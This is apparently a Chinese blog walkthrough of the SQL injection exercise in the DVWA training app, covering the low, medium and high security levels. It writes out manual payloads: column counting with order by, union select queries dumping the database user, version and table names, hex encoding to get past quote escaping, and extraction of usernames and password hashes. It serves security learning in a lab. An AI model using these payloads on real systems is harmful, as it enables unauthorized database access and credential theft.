完成dvwas中sql注入模块的练习

最新推荐文章于 2023-09-28 13:56:38 发布
最新推荐文章于 2023-09-28 13:56:38 发布
阅读量996 收藏 1
点赞数 1
文章标签: sql 数据库 database
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/S_cx666/article/details/122016041
版权

1登陆dvwa网页(用户名:admin 密码:password)
在这里插入图片描述2修改安全级别(默认是impossible,改成low)
在这里插入图片描述3点击SQL injection
在这里插入图片描述
4先输入一个 后弹出
在这里插入图片描述

我们开始分析这句话: You have an error in your SQL syntax; check the manual that
corresponds to your MariaDB server version for the right syntax to use
near ‘’’’’ at line 1 意译:您的SQL语法有错误;请查看与您的MariaDB服务器版本相对应的手册,以获取在第1行的
‘’’’’ 附近使用的正确语法

此处有五个单引号,分为三个部分: 最外面一对,只是为了高亮显示,起到强调的作用 再往里一对,是对于字符串类型的SQL查询语句的自动闭合
最里面的一个,是刚刚我们输入的SQL语句

5.然后依次输入 1 1 and 1=1 1 and 1=2
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

and逻辑语句并没有起到应有的结果,所以这不是整型注入,并且and并没有被过滤

6.依次输入1’ and 1=‘1 1’ and 1=‘2 1’ and 1=1 1’ and 1=2 #
在这里插入图片描述
在这里插入图片描述

and逻辑语句起到了作用,所以为字符型注入 单引号没有被过滤,可以使用单引号手工闭合
注释符#也没有被过滤,可以注释后面系统自动闭合的一个单引号

7.依次输入:1’ or 1=‘1 1’ or 1=‘2 1’ or 1=1 1’ or 1=2 #
![在这里插入图片描述](https://img-blog.csdnimg.cn/09ff1cc8421f415fabab6ccf3d3e771d.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBAU19jeDY2Ng==,size_15,color_FFFFFF,t_70,g_se,x_16
在这里插入图片描述
在这里插入图片描述

分析: or逻辑语句起到了作用,所以印证了之前的字符型注入 or没有被过滤,毕竟正常解析了嘛

8使用order by猜解字段数,依次 输入:1’ order by
10#------------------------显示未知列,也就是不存在那么多列 输入:1’ order by
5#------------------------显示未知列,也就是不存在那么多列 输入:1’ order by
3#------------------------显示未知列,也就是不存在那么多列 输入:1’ order by
2#------------------------直到这里,我们才正常回显

在这里插入图片描述

分析: 使用二分法,来确定这个从表中查询内容的查询语句,其表中的字段有两个,也就是列有两列

9使用union select猜解字段回显的顺序:
输入:1’ union select 1,‘2
或者输入:1’ union select 1,2#
在这里插入图片描述
在这里插入图片描述

分析: ①、这里的手工闭合,还有使用注释符#略过自动闭合的单引号都可以成功注入 ②、回显的顺序位置,很明显,名(first
name)这个列是1位置,姓(Surname)这个列是2位置

10使用union select联合查询,爆用户,数据库版本,当前目录等等:

输入:1’ union select 1,user()#
输入:1’ union select 1,version()#
输入:1’ union select 1,@@basedir#
在这里插入图片描述
在这里插入图片描述

11爆当前数据库的表名:users和guestbook表

输入:1’ union select 1,group_concat(table_name) from information_schema.tables where table_schema=‘dvwa--------单引号没被过滤,可以手动闭合
或者输入:1’ union select 1,group_concat(table_name) from information_schema.tables where
table_schema=‘dvwa’#--------单引号没被过滤,不可以手动闭合
或者输入:1’ union select 1,group_concat(table_name) from information_schema.tables where
table_schema=0x64767761#----------单引号被过滤,不可以手动闭合(dvwa的十六进制:0x64767761)
或者输入:1’ union select 1,group_concat(table_name) from
information_schema.tables where table_schema=database()#
总结:单引号是否被过滤,单引号是否可以进行手动闭合,注释符是否可以使用

在这里插入图片描述
在这里插入图片描述

分析: MySQL数据库的密码,都是默认经过md5加密的,我们解码即可得到密码

综上所述:得到该MySQL数据库中名为dvwa数据库的,其中dvwa平台的用户名和密码
用户名:admin
密码:password
//注意爆出的并不是MySQL数据库的管理员用户名和密码,只是这个数据库里的,有一个名为dvwa的数据库里存了一个dvwa平台的登录用户名和密码

12.开始Medium级别的SQL注入
在这里插入图片描述
我们对火狐浏览器时候代理,用Burpsuite来拦截请求包,修改后,再放通
首先给浏览器设置代理:
在这里插入图片描述
在浏览器选择1,点击提交;并且在Burpsuite对拦截的包修改后放通
在这里插入图片描述

拦截后修改的顺序:

1、确定注入点类型:为整型注入 and 1=1 正常回显 and 1=2 不回显,说明and逻辑语句起到了效果 or
1=1 正常回显 or 1=2 正常回显,说明or逻辑语句页起到了效果

2、找那些被过滤了 :(这里是利用了转移字符来把特殊的字符转义了其字符原有的含义,达到了过滤的效果) ’ 报错,内容为: ’ \ ’
’ 对于报错内容分析:最外面一对单引号是高亮显示,起到了强调的作用,里面的
',说明该dvwa的管理员对单引号进行了转义,也就是过滤了单引号,我们之后就不能用手动闭合了。。。。

3、猜解字段数: order by 10 order by 5 order by 3 order by 2

4、猜解字段回显顺序 union select 1,2

5、爆库名、数据库版本、数据库用户名、当前目录 union select database(),version union select
user(),@@basedir()

6、爆名为dvwa的数据库里的表有哪些:guestbook,users union select
1,group_concat(table_name) from information_schema.tables where
table_schema=‘dvwa’ //此处会报错,内容为:’‘dvwa’’
因为单引号被转义了嘛,我们可以使用转换为十六进制来绕过,毕竟转换为十六进制后,就相当于专有名词,不再需要些单引号了 union select
1,group_concat(table_name) from information_schema.tables where
table_schema=0x64767761

7、爆名为users表的字段名:特殊的有user和password union select
1,group_concat(column_name) from information_schema.columns where
table_name=0x7573657273

8、爆名为user和password字段的值:得到特殊的有 admin : 5f4dcc3b5aa765d61d8327deb882cf99
union select 1,group_concat(concat_ws(char(32,58,32),user,password))
from users

开始High级别的SQL注入

1、判断注入点类型: ’ 报错,报错内容为:Something went wrong. 1 and 1=1 正常回显 1 and
1=2 正常回显,说明and逻辑语句没有起到效果,初步认为是字符型注入 1’ and ‘1 正常回显 1’ and
1=‘2 不回显,初步认为and语句起到了 效果 1’ or ‘1 不正常的回显,or语句没有起到效果 1’ or
1=‘2 不正常的回显,or语句没有起到效果 //既然如此的模糊不清,我们使用#来测试 1’ and 1# 正常回显 1’ and
1=2# 不回显,and语句起到了效果 1’ or 1# 正常回显 1’ or 1=2# 正常回显,or语句起到了效果
//以上说明了,单引号的手工闭合,可能不能用了

2、使用order by猜解字段数为:2 1’ order by 10# 1’ order by 5# 1’ order by 3#
1’ order by 2#

3、使用union select猜解字段回显顺序:First name:1,Surname:2 1’ union select
1,2# 正常回显 1’ union select
1,'2 不正常的回显,说明单引号的手工闭合,不起到效果了,与此前在判断注入点类型的时候,印证了

4、使用union select爆库名、数据库版本、数据库用户、当前目录 1’ union select
database(),version()# 1’ union select user(),@@basedir#

5、使用union select爆dvwa库中的表名 1’ union select 1,group_concat(table_name)
from information_schema.tables where
table_schema=‘dvwa 不正常回显,说明单引号不能用来手工闭合了 1’ union select
1,group_concat(table_name) from information_schema.tables where
table_schema=‘dvwa’# 正常回显,说明单引号只是不能手工闭合,但是可以使用 1’ union select
1,group_concat(table_name) from information_schema.tables where
table_schema=0x64767761# 正常回显

6、使用union select爆users表中的字段名 1’ union select
1,group_concat(column_name) from information_schema.columns where
table_name=‘users 不正常回显,再一次印证了单引号不能用来手工闭合 1’ union select
1,group_concat(column_name) from information_schema.columns where
table_name=‘users’# 正常回显,再一次印证了单引号只是不能用来手工闭合,但是可以使用 1’ union select
1,group_concat(column_name) from information_schema.columns where
table_name=0x7573657273# 正常回显

7、使用union select爆users表中的字段值 1’ union select
1,group_concat(concat_ws(char(32,58,32),user,password)) from
users# 正常回显

总结:字符型注入的7个要点

1、什么类型的注入
2、过滤了什么
3、单引号是否被过滤
4、单引号,如果没有被过滤,是否可以手工闭合
5、是否可以使用注释符#
6、使用order by猜解字段数的时候以及爆字段值的时候,不能使用手动闭合
7、使用union select联合查询的时候,不能对专有名词手动闭合,十六进制也属于专有名词

Major0712
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
DVWASQL注入SQL Injection)
qq_39682037的博客
03-20 2223
SQL注入SQL Injection) SQL注入是指攻击者通过注入恶意的SQL命令,破坏SQL查询语句的结构,从而达到执行恶意SQL语句的目的。 Security Level: low 测试流程 输入1 输入2 输入1‘,无响应 输入1 and 1=1 输入1 and 1=2 故猜测sql语句结构为 select First name的列名 and Surname的列名 from ...
DVWA系列---基于报错的SQL注入SQL Injection)
野原新之助
02-06 1255
文章目录1、Low2、Medium3、High
DVWA-SQL注入
最新发布
weixin_58954236的博客
09-28 249
会在疑似注入点的地方或者参数后面尝试提交数据,从而进行判断是否存在SQL注入漏洞。
DVWA sql注入(high)
gclome的博客
07-05 4690
有了前两关的基础,现在做起来,比较得心应手了 现在开始: 1.输入1' 输入1' and '1'='1 输入1' and '1'='2 由此可见,这也是一个字符型的注入 2.获取字段数 输入1' order by 2# 输入1' order by 3# 由此可见,字段数是2, 我觉得所谓high等级较前两个的区别就是出错了之后,不再提醒错误原因,只显示Something went wrong. 3...
sql注入练习工具
11-08
SQL注入是一种常见的网络安全漏洞,它发生在应用程序未能充分验证或过滤用户输入的数据,导致恶意SQL代码被插入到数据库查询。这种攻击方式可以让攻击者获取、修改、删除数据库的敏感信息,甚至完全控制数据库...
sql注入讲解ppt.pptx
08-10
SQL 注入是指 web 应用程序对用户输入数据的合法性没有判断或过滤不严,攻击者可以在 web 应用程序事先定义好的查询语句的结尾上添加额外的 SQL 语句,在管理员不知情的情况下实现非法操作,以此来实现欺骗数据库...
SQL 注入天书.pdf
08-06
SQL注入SQL Injection)是网络渗透测试的关键一环,涉及到服务器安全、数据保护和应用设计等多个方面。sqli-labs是一个在线学习平台,由Lcamry创建,提供了多个级别的挑战,让学习者逐步了解和掌握SQL注入技术。...
Python防止sql注入的方法详解
09-21
SQL注入是比较常见的网络攻击方式之一,它不是利用操作系统的BUG来实现攻击,而是针对程序员编程时的疏忽,通过SQL语句,实现无...下面这篇文章主要给大家介绍了关于Python防止sql注入的方法,需要的朋友可以参考下。
sql注入攻击流量情况
07-18
sql注入攻击流量情况
GitHub 读取jupyter报错Sorry, something went wrong. Reload?
12-23
GitHub 读取jupyter报错Sorry, something went wrong. Reload?
DVWA漏洞测试之SQL注入
JBlock的博客
11-08 4672
我们已经在前面讨论过sql注入漏洞产生的原因和一些绕过waf的技巧。今天话不多说直接上测试:首先我们先理清手工注入思路: 1.判断是否存在注入,注入是字符型还是数字型 2.猜解SQL查询语句的字段数 3.确定显示的字段顺序 4.获取当前数据库 5.获取数据库的表 6.获取表的字段名 7.下载数据LOW级别必须的第一步,看源码:<?php if( isset( $_REQUEST[
dvwaSQL注入&盲注
shannow_123的博客
06-05 3449
dvwaSQL注入sql注入手工注入思路low1.判断注入类型2.判断字段数3.确定显示的字段顺序4.获取当前数据库5.获取数据库的表名6.获取表的字段名7.下载数据mediumhighsql盲注lowmediumhigh sql注入 手工注入思路 1.判断是否存在注入,注入是字符型还是数字型 2.猜解SQL查询语句的字段数 3.确定显示的字段顺序 4.获取当前数据库 5.获取数据...
DVWA靶场-sql注入sqlInjection)
zeroone的博客
03-10 5957
第七关:SQL Injection       SQL注入,是指攻击者通过注入恶意的SQL命令,破坏SQL查询语句的结构,从而达到执行恶意SQL语句的目的。SQL注入漏洞的危害是巨大的,常常会导致整个数据库被“脱裤”,尽管如此,SQL注入仍是现在最常见的Web漏洞之一。 Low <?php if( isset( $_REQUEST[ 'Submit' ] ) ) { // Get input $id = $_REQUEST[
dvwa系列-sql注入
一个安全研究员
05-23 2227
前言 本篇博文就不详细讲解sql注入的成因了,有兴趣的就去看看我sqlilabs的博文吧,我后面会慢慢完成sqlilabs的博文 low 我们先来判断注入点吧,用最常规的单引号试一试,报错了,初步判断应该是字符型的单引号注入。 下面就推断一下后台执行的sql语句,因为这是一个根据输入的id来查找信息的地方嘛,后台sql大概是: select id,firstname,surname ...
1、SQL注入模块——DVWA
qwsn
01-20 2711
0x01、DVWA环境的搭建(Linux版本)(用到了VMwareworkstations)
自己收集的一些常见SQL注入方式(持续更新,增加了无列名注入和Timing Attack注入)
sGanYu
10-19 2049
目录 注入点位置及发现 判断输入点是否存在注入测试 数值型: 字符型: group_concat注入: union注入: limit注入: 报错注入: 布尔注入: 时间注入: 堆查询注入: 宽字节注入: base64注入: Cookie注入、Referer注入、UA注入、XFF注入 预编译注入: Handler注入(从表名查询字段名): SQL绕过WAF 通过SQL语句读写文件 注入点位置及发现: GET参数注入 POST参数注入 use.
SQL注入心得
A9874564的博客
02-21 933
1.union 联合查询 查询当前数据库名 报错的语法(如and1=2)+ union select 1,database() 查询当前数据库版本 union select 1,version() 查询当前数据库 表名 1.union select 1,table_name from information_schema.tables where table_schema=database() limit 0,1 2.查询当前数据库所有表,并且拼接在一行显示 union select 1,group_co.
"You have an error in your SQL syntax; check the manual that corresponds to your MySQL server versio
热门推荐
BFELFISH的博客
06-04 1万+
数据库进行操作时出错,百度了n多个解决方法后,看到有个是把关键字当表名了,我就尝试在MySQL建立查询,发现后面怎么改都出错,然后,将order重命名为orders后,再查询,过了。后了解到是因为order是关键字 如果是别的出现这个错误,但是没有用order的,可以考虑是不是sql写错了,可以先在数据库建立查询测试一下。 百度了这么多,总结主要解决方法 1.SQL语句写错 先...
DVWASQL注入攻防实战指南
"DVWA(Damn Vulnerable Web ...DVWASQL注入练习帮助我们理解攻击者的思路,提高对SQL注入漏洞的认识,并学习如何防止这类攻击。通过这样的实践,我们可以提升Web应用的安全性,避免潜在的数据泄露和系统破坏。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值